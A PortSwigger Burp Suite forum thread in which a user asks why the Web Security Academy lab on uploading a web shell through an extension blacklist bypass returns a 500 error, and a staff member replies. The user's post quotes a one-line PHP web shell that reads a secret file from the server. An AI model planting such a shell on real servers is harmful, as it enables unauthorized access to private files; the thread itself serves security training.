Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

Web shell upload via extension blacklist bypass;

Benjamin | Last updated: May 30, 2024 07:56PM UTC

I've followed the directions to the letter and then tried the video tutorial, both times this the the final response from GET /files/avatars/exploit.l33t or the video's GET /files/avatars/shell.shell: " HTTP/2 500 Internal Server Error Date: Thu, 30 May 2024 19:49:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Type: text/html; charset=iso-8859-1 X-Frame-Options: SAMEORIGIN Content-Length: 610 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>500 Internal Server Error</title> </head><body> <h1>Internal Server Error</h1> <p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p> <p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p> <p>More information about this error may be available in the server error log.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at bd340acb9570 Port 80</address> </body></html> " Is there something wrong with the contents of my exploit.php file? "<?php echo file_get_contents('/home/carlos/secret'); ?>"

Michelle, PortSwigger Agent | Last updated: May 31, 2024 12:22PM UTC

Hi I've just run through the same lab following the steps and did not see the same 500 Internal Server Error. Can you run through the steps once more and if you're still seeing the same problem, can you please email support@portswigger.net with screenshots of the steps you're taking?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.